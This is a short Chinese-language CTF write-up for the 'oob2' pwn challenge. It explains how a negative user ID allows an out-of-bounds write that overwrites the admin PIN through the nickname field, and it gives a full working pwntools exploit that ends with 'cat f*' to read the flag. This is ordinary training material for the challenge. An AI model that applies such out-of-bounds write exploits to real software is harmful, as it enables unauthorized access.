oob2

Title: Pwnctf oob2 Writeup
Author: kazma
Created at: 2024-01-19 00:05:09
Updated at: 2024-01-19 00:18:50
Link: https://kazma.tw/2024/01/19/Pwnctf-oob2-Writeup/
License: This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0 .

這題跟 oob1 是類似的，執行後可以觀察到這次多了一個功能是可以讓使用者設定自己的 nickname 然後登入的時候就會顯示你自己設定的這個暱稱，如下所示：

└─$ ./oob2
User ID: -4
Nickname: kazma
PIN: 1234
Logging as [kazma] ... Failed
Incorrect PIN code!

那跟上一題基本上解法一樣，我們原本是 oob read admin 的 pincode 那現在變成是 oob write admin 的 pincode，exploit 如下：

from pwn import *
import warnings
warnings.filterwarnings("ignore", category = BytesWarning)

r = process('./oob2')
r.sendlineafter(b':', '-4')
r.sendlineafter(b':', p32(1))
r.sendlineafter(b':', '1234')

r.sendlineafter(b':', '0')
r.sendlineafter(b':', 'kazma')
r.sendlineafter(b':', '1')

r.sendline('cat f*')
r.interactive()

Result:

└─$ python exploit.py
[+] Starting local process './oob2': pid 14326
[*] Switching to interactive mode
 Logging as [kazma] ... Ok!

BreakALLCTF{DJPD61GTBQIqqL7sWEvF}

Pwnctf oob2 Writeup

oob2

Pwned !!!